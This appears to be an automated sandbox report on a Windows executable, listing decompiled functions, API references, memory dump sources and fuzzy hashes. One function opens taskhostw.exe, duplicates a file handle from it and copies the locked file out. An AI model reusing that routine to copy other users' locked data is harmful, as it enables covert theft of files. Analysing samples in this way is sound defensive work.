0x0040e1ee
0x0040e1f0
0x0040e1f0
0x0040e1f0
0x0040e1f2
0x0040e1f2
0x0040e1ee
0x0040e1f5
0x0040e1f5
0x0040e1f8
0x0040e1fb
0x0040e1fd
0x0040e201
0x00000000
0x00000000
0x0040e201
0x0040e203
0x0040e20a
0x0040e210
0x0040e214
0x0040e22b
0x0040e216
0x0040e216
0x0040e216
0x0040e237
0x0040e23c
0x0040e23e
0x0040e241
0x0040e244
0x0040e247
0x0040e247
0x0040e24d
0x0040e282
0x0040e282
0x0040e282
0x0040e286
0x0040e1c0
0x0040e1c0
0x0040e1c4
0x0040e1c4
0x0040e28d

APIs

GetModuleHandleA.KERNEL32(00000000,0040F3F0,00000070), ref: 0040E0B3
__set_app_type.MSVCRT ref: 0040E112
__p__fmode.MSVCRT ref: 0040E127
__p__commode.MSVCRT ref: 0040E135
__setusermatherr.MSVCRT ref: 0040E161
_initterm.MSVCRT ref: 0040E177
__wgetmainargs.KERNELBASE ref: 0040E19A
_initterm.MSVCRT ref: 0040E1AD
GetStartupInfoW.KERNEL32(?), ref: 0040E20A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040E230
exit.KERNELBASE ref: 0040E247
_cexit.MSVCRT ref: 0040E24D

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
Instruction ID: c002ea54ac36ed1473f3b1447c0311433b5c4b2607527e15f7219f70d0093426
Opcode Fuzzy Hash: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
Instruction Fuzzy Hash: C251A071C40215DBCB34AFA6D9489AD7BB4EB04310F20897FE821BB2E1D7794D96DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5E9, Relevance: 18.1, APIs: 12, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C5E9(void* __eflags, void* _a4, long _a8, void* _a12, long _a16) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				struct _OVERLAPPED* _v20;
				char _v24;
				void* __edi;
				void* __esi;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t52;
				int _t55;
				int _t57;
				void* _t67;

				_t57 = 0;
				_v8 = 0;
				_v12 = 0;
				_t38 = E0040C6FB(_a4, __eflags, _a8, _a12,  &_v8,  &_v12); // executed
				if(_t38 != 0) {
					_v24 = 0;
					_v20 = 0;
					_v16 = 0x1388;
					E00406729(0x8000,  &_v24);
					_t41 = OpenProcess(0x40, 0, _v8);
					_v8 = _t41;
					if(_t41 != 0) {
						_a12 = 0;
						DuplicateHandle(_v8, _v12, GetCurrentProcess(),  &_a12, 0x80000000, 0, 0); // executed
						if(_a12 != 0) {
							_a8 = GetFileSize(_a12, 0);
							_a4 = E00405351(_a16);
							_t49 = CreateFileMappingW(_a12, 0, 2, 0, 0, 0); // executed
							_v12 = _t49;
							if(_t49 != 0) {
								_t52 = MapViewOfFile(_t49, 4, 0, 0, _a8); // executed
								_t67 = _t52;
								if(_t67 != 0) {
									_a16 = 0;
									_t55 = WriteFile(_a4, _t67, _a8,  &_a16, 0); // executed
									_t57 = _t55;
									UnmapViewOfFile(_t67);
								}
								FindCloseChangeNotification(_v12); // executed
							}
							CloseHandle(_a4);
							CloseHandle(_a12);
						}
						CloseHandle(_v8);
					}
					E00406710( &_v24);
				}
				return _t57;
			}

0x0040c601
0x0040c603
0x0040c606
0x0040c609
0x0040c610
0x0040c620
0x0040c623
0x0040c626
0x0040c62d
0x0040c638
0x0040c640
0x0040c643
0x0040c654
0x0040c664
0x0040c673
0x0040c682
0x0040c694
0x0040c697
0x0040c69f
0x0040c6a2
0x0040c6ac
0x0040c6b2
0x0040c6b6
0x0040c6c0
0x0040c6c7
0x0040c6ce
0x0040c6d0
0x0040c6d0
0x0040c6d9
0x0040c6d9
0x0040c6de
0x0040c6e3
0x0040c6e3
0x0040c6e8
0x0040c6e8
0x0040c6ed
0x0040c6f3
0x0040c6f8

APIs

Part of subcall function 0040C6FB: memset.MSVCRT ref: 0040C725
Part of subcall function 0040C6FB: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
Part of subcall function 0040C6FB: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
Part of subcall function 0040C6FB: GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
Part of subcall function 0040C6FB: _wcsicmp.MSVCRT ref: 0040C816

Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E

OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C638
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C657
DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C664
GetFileSize.KERNEL32(?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C679

Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363

CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C697
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00001388,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6AC
WriteFile.KERNELBASE(?,00000000,00001388,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6C7
UnmapViewOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D0
FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D9
CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6DE
CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E3
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E8

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationView$??2@??3@DuplicateMappingOpenSizeUnmapWrite_wcsicmpmemset
String ID:
API String ID: 3028965261-0
Opcode ID: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
Instruction ID: e6db179c7e43cd6fbe3270d478d1169048f03751868c197fc0ca6440827a8631
Opcode Fuzzy Hash: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
Instruction Fuzzy Hash: DD31F5B5800209FFDB11AFA5DD889AE7BB9FB08344F10443AF905B6260D7758E54DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040DACC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040DACC(wchar_t* __ebx, void* __ecx) {
				void* _v8;
				char _v72;
				void _v590;
				long _v592;
				void* __esi;
				void* _t25;
				void* _t27;
				intOrPtr _t38;

				_t27 = __ecx;
				_t26 = __ebx;
				E0040DA9D();
				_t38 =  *0x413264; // 0x76213bb0
				if(_t38 == 0) {
					_v592 = 0;
					memset( &_v590, 0, 0x206);
					_t3 =  &_v8; // 0x403a63
					if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, 0x20019, _t3) == 0) {
						_t5 =  &_v8; // 0x403a63
						E0040D6BF(0x104, _t27,  &_v592,  *_t5,  &_v72);
						RegCloseKey(_v8);
					}
					wcscpy(_t26,  &_v592);
					return 0 |  *_t26 != 0x00000000;
				}
				E004058FB();
				_t25 =  *0x413264(0, __ebx, 0x1c, 0); // executed
				return _t25;
			}

0x0040dacc
0x0040dacc
0x0040dad6
0x0040dadd
0x0040dae3
0x0040db04
0x0040db0b
0x0040db13
0x0040db2f
0x0040db36
0x0040db44
0x0040db4e
0x0040db54
0x0040db5d
0x00000000
0x0040db69
0x0040dae5
0x0040daef
0x00000000

APIs

Part of subcall function 0040DA9D: LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
Part of subcall function 0040DA9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
memset.MSVCRT ref: 0040DB0B
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,c:@,?,?,?), ref: 0040DB27
RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040DB4E
wcscpy.MSVCRT ref: 0040DB5D

Part of subcall function 004058FB: GetVersionExW.KERNEL32(00412B18,?,0040DAEA,?), ref: 00405915

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040DB1D
c:@, xrefs: 0040DB13, 0040DB36, 0040DB16

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseFolderLibraryLoadOpenPathProcSpecialVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$c:@
API String ID: 2249099915-3068728944
Opcode ID: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
Instruction ID: c666c52b0d5343781dad8f8333b9175691e3d2dec84d7c30fbf64d54c1d05659
Opcode Fuzzy Hash: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
Instruction Fuzzy Hash: FE01D671905214AED720BB95AD4AEEF777CDF84304F2000BAF909B10D2EA745E88DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB15, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040BB15(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				struct HICON__* _t42;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t57;
				intOrPtr* _t59;
				void* _t60;

				_t59 =  *((intOrPtr*)(_t60 + 0xc));
				 *((intOrPtr*)(_t59 + 0x208)) = 0;
				 *((intOrPtr*)(_t59 + 0x244)) = 0;
				 *((intOrPtr*)(_t59 + 0x274)) = 0;
				 *((intOrPtr*)(_t59 + 0x240)) = 0;
				 *_t59 = 0x410438;
				_t35 = _t59 + 0x6ac;
				 *((intOrPtr*)(_t59 + 0x694)) = 0;
				_t50 = _t59 + 0x6c4;
				 *((intOrPtr*)(_t35 + 0xc)) = 0;
				 *_t35 = 0;
				 *((intOrPtr*)(_t35 + 4)) = 0;
				 *((intOrPtr*)(_t35 + 0x10)) = 0x100;
				 *((intOrPtr*)(_t35 + 8)) = 0;
				E0040133A(_t50);
				 *_t50 = 0x40f7b8;
				_t37 = E0040167A(_t50 + 0x40);
				 *((short*)(_t50 + 0x80)) = 0;
				 *((intOrPtr*)(_t50 + 0x2080)) = 1;
				 *((intOrPtr*)(_t50 + 0x2084)) = 1;
				 *((intOrPtr*)(_t50 + 0x2088)) = 1;
				_push(0x2238);
				 *((intOrPtr*)(_t50 + 4)) = 0x72;
				 *((intOrPtr*)(_t50 + 0x74)) = 0;
				 *((intOrPtr*)(_t50 + 0x78)) = 0;
				L0040E038(); // executed
				if(_t37 == 0) {
					_t37 = 0;
					__eflags = 0;
				} else {
					 *((intOrPtr*)(_t37 + 0x14)) = 1;
					 *((short*)(_t37 + 0x18)) = 0;
					 *((short*)(_t37 + 0x228)) = 0;
					 *((intOrPtr*)(_t37 + 0x2228)) = 1;
					 *((intOrPtr*)(_t37 + 0x222c)) = 1;
					 *((intOrPtr*)(_t37 + 0x2230)) = 1;
					 *0x412b14 = _t37;
				}
				 *((intOrPtr*)(_t59 + 0x698)) = _t37;
				L0040E038();
				_t63 = _t37;
				_t48 = 0xc00;
				if(_t37 == 0) {
					_t38 = 0;
					__eflags = 0;
				} else {
					_t38 = E0040219B(_t37, _t63);
				}
				_t57 = _t59 + 0x27c;
				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x69c)) = _t38;
				E00401000(_t59 + 0x492, _t48, 0x412054);
				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x284)) = 0;
				 *((intOrPtr*)(_t59 + 0x280)) = 0;
				 *((intOrPtr*)(_t59 + 0x278)) = 0;
				 *((intOrPtr*)(_t59 + 0x6a0)) = 0;
				_t42 = LoadIconW(GetModuleHandleW(0), 0x65); // executed
				E00401879(_t59, _t42);
				return _t59;
			}

0x0040bb19
0x0040bb1e
0x0040bb24
0x0040bb2a
0x0040bb30
0x0040bb36
0x0040bb3d
0x0040bb43
0x0040bb4a
0x0040bb52
0x0040bb55
0x0040bb57
0x0040bb5a
0x0040bb61
0x0040bb64
0x0040bb6c
0x0040bb72
0x0040bb7a
0x0040bb81
0x0040bb87
0x0040bb8d
0x0040bb93
0x0040bb98
0x0040bb9f
0x0040bba2
0x0040bba5
0x0040bbad
0x0040bbd6
0x0040bbd6
0x0040bbaf
0x0040bbaf
0x0040bbb2
0x0040bbb6
0x0040bbbd
0x0040bbc3
0x0040bbc9
0x0040bbcf
0x0040bbcf
0x0040bbdd
0x0040bbe3
0x0040bbe8
0x0040bbea
0x0040bbeb
0x0040bbf4
0x0040bbf4
0x0040bbed
0x0040bbed
0x0040bbed
0x0040bbf6
0x0040bbfc
0x0040bc09
0x0040bc0f
0x0040bc17
0x0040bc19
0x0040bc1f
0x0040bc25
0x0040bc2b
0x0040bc3a
0x0040bc43
0x0040bc4e

APIs

Part of subcall function 0040133A: memset.MSVCRT ref: 0040134C

Part of subcall function 0040167A: memset.MSVCRT ref: 00401690

??2@YAPAXI@Z.MSVCRT ref: 0040BBA5
??2@YAPAXI@Z.MSVCRT ref: 0040BBE3
GetModuleHandleW.KERNEL32(00000000,?,00002238), ref: 0040BC31
LoadIconW.USER32(00000000,00000065), ref: 0040BC3A

Strings

T A, xrefs: 0040BC04

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@memset$HandleIconLoadModule
String ID: T A
API String ID: 2596266805-11209434
Opcode ID: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
Instruction ID: b1f1b1f427025bd6f8a5dd4ebf1048772c532f9d5de5c5214c9bf7dacc49333d
Opcode Fuzzy Hash: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
Instruction Fuzzy Hash: 1F31ACB19013559FC720DF6989886CABBE8FF08300F11867FE84CDB261D7B89654CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D56B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E0040D56B(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;
				long _t17;

				_t25 = __esi;
				E0040E340(0x20000, __ecx);
				if(_a4 == 0) {
					_t17 = GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24); // executed
					return _t17;
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040DFD6();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

0x0040d56b
0x0040d573
0x0040d57c
0x0040d5e0
0x0040d5e7
0x0040d57e
0x0040d580
0x0040d5be
0x0040d590
0x0040d590
0x0040d598
0x0040d599
0x0040d5a4
0x0040d5a9
0x0040d5aa
0x0040d5b2
0x0040d5bb
0x0040d5bb
0x0040d5cf
0x0040d5cf

APIs

wcschr.MSVCRT ref: 0040D585
_snwprintf.MSVCRT ref: 0040D5AA
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D5C8
GetPrivateProfileStringW.KERNEL32 ref: 0040D5E0

Strings

"%s", xrefs: 0040D599

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
Instruction ID: 59b69a585cfc8d845437793ab3ce32260e68e2dddd06eaeef13322f749f2ab00
Opcode Fuzzy Hash: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
Instruction Fuzzy Hash: 3101783290421ABBEF219F919C06FDA3B6AAF04318F048035BE05601A2D7798525DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE3D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CE3D(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x4136f4 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x4136f4 = 1;
						 *0x4136f8 = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x4136f8 == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040ce47
0x0040ce4e
0x0040ce56
0x0040ce5e
0x0040ce6e
0x0040ce6e
0x0040ce56
0x0040ce7a
0x0040ce92
0x0040ce7c
0x0040ce8b
0x0040ce8e
0x0040ce8e

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE4E
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0040CE68
GetProcessTimes.KERNELBASE(?,?,?,?,?,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE8B

Strings

kernel32.dll, xrefs: 0040CE49
GetProcessTimes, xrefs: 0040CE58

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
Instruction ID: 9062282254ac126051856908680c029023e6c569a8a6eaee544e1b96dd2f004d
Opcode Fuzzy Hash: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
Instruction Fuzzy Hash: E7F03031141209FFDF218FA0ED45F963BA8AB14301F008176F92CA1AB0D77585A4DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401DCF, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401DCF(void* __ecx, signed int _a4, signed short* _a8) {
				signed int _t23;
				signed short* _t24;
				void* _t27;
				signed short* _t32;

				_t23 = _a4;
				_t32 = _a8;
				 *_t32 =  *_t32 & 0x00000000;
				_t27 = 0xa;
				if(_t23 > _t27) {
					L12:
					_t24 = _t32;
					L13:
					return _t24;
				}
				switch( *((intOrPtr*)(_t23 * 4 +  &M00401E73))) {
					case 0:
						__eax = __ecx + 0x38;
						goto L15;
					case 1:
						__eax = __ecx + 0x30;
						L15:
						__eax = E00401D90(__eax, __esi); // executed
						goto L12;
					case 2:
						__ecx =  *((intOrPtr*)(__ecx + 0x10));
						goto L18;
					case 3:
						__ecx =  *((intOrPtr*)(__ecx + 0x14));
						goto L18;
					case 4:
						__ecx =  *((intOrPtr*)(__ecx + 0x18));
						goto L18;
					case 5:
						__ecx =  *((intOrPtr*)(__ecx + 0x1c));
						L18:
						__eax = 0x412320;
						goto L3;
					case 6:
						__eflags =  *(__ecx + 0x40) & 0x00000001;
						goto L6;
					case 7:
						__eflags =  *(__ecx + 0x40) & 0x00002000;
						goto L6;
					case 8:
						__eflags =  *(__ecx + 0x40) & 0x00004000;
						L6:
						if(__eflags == 0) {
							_push(9);
							_pop(__ebx);
						}
						__eax = E00406827(__ebx);
						goto L13;
					case 9:
						_push( *((intOrPtr*)(__ecx + 0x2c)));
						_push( *((intOrPtr*)(__ecx + 0x28)));
						_push(L"%I64d");
						_push(0xff);
						_push(__esi);
						L0040DFD6();
						__esp = __esp + 0x14;
						goto L12;
					case 0xa:
						_t30 =  *((intOrPtr*)(__ecx + 0x20));
						L3:
						_t24 = E00406306(0x412340, _t30);
						if(_t24 == 0) {
							_t24 = 0x40f454;
						}
						goto L13;
				}
			}

0x00401dd5
0x00401dda
0x00401ddd
0x00401de3
0x00401de6
0x00401e40
0x00401e40
0x00401e42
0x00401e47
0x00401e47
0x00401de8
0x00000000
0x00401e4a
0x00000000
0x00000000
0x00401e55
0x00401e4d
0x00401e4e
0x00000000
0x00000000
0x00401e5a
0x00000000
0x00000000
0x00401e64
0x00000000
0x00000000
0x00401e69
0x00000000
0x00000000
0x00401e6e
0x00401e5d
0x00401e5d
0x00000000
0x00000000
0x00401e07
0x00000000
0x00000000
0x00401e1f
0x00000000
0x00000000
0x00401e17
0x00401e0b
0x00401e0b
0x00401e0d
0x00401e0f
0x00401e0f
0x00401e10
0x00000000
0x00000000
0x00401e27
0x00401e2a
0x00401e2d
0x00401e32
0x00401e37
0x00401e38
0x00401e3d
0x00000000
0x00000000
0x00401def
0x00401df7
0x00401df7
0x00401dfe
0x00401e00
0x00401e00
0x00000000
0x00000000

APIs

_snwprintf.MSVCRT ref: 00401E38

Strings

%I64d, xrefs: 00401E2D
@#A, xrefs: 00401DF2
#A, xrefs: 00401E5D

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: #A$%I64d$@#A
API String ID: 3988819677-2754857024
Opcode ID: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
Instruction ID: 57e1b299ab2ee78cab24039c69e456b61a4fcaae797c094412e686c8a915beca
Opcode Fuzzy Hash: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
Instruction Fuzzy Hash: A811BF31204204D7D724AA54D841AA97369BB01358B3004BFFE16AE2E2D77AD953D3CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040562D, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040562D(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x40655f
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x0040562d
0x0040562e
0x00405632
0x0040567d
0x00405634
0x00405635
0x00405637
0x00405637
0x0040563b
0x0040563d
0x0040563f
0x00405649
0x00405651
0x00405653
0x00405657
0x00405661
0x00405666
0x0040566a
0x0040566f
0x00405679
0x00405679

APIs

malloc.MSVCRT ref: 00405649
memcpy.MSVCRT ref: 00405661
free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74B04E00,?,00000000), ref: 0040566A

Strings

_e@, xrefs: 00405637

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: _e@
API String ID: 3056473165-4143410925
Opcode ID: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
Instruction ID: 65c1df984c8dd591618957182971b53504cae5b365517194d008c843f4823b23
Opcode Fuzzy Hash: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
Instruction Fuzzy Hash: 78F0E2B26052229FC718AB76B98184BB3ADEF443247504C3FF408E3281D7399C50CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004061CD, Relevance: 6.0, APIs: 4, Instructions: 34
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004061CD(FILETIME* __edi, signed int* __esi) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				int _t12;

				if(__edi->dwHighDateTime != 0) {
					FileTimeToSystemTime(__edi,  &_v20);
					_t12 = SystemTimeToTzSpecificLocalTime(0,  &_v20,  &_v36); // executed
					_push(__esi);
					if(_t12 == 0) {
						return FileTimeToLocalFileTime(__edi, ??);
					} else {
						SystemTimeToFileTime( &_v36, ??);
						return 1;
					}
				} else {
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
					return 0;
				}
			}

0x004061d7
0x004061e9
0x004061f9
0x00406201
0x00406202
0x0040621b
0x00406204
0x00406208
0x00406212
0x00406212
0x004061d9
0x004061d9
0x004061dc
0x004061e3
0x004061e3

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,00401DAD), ref: 004061E9
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,00401DAD), ref: 004061F9
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00401DAD), ref: 00406208

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
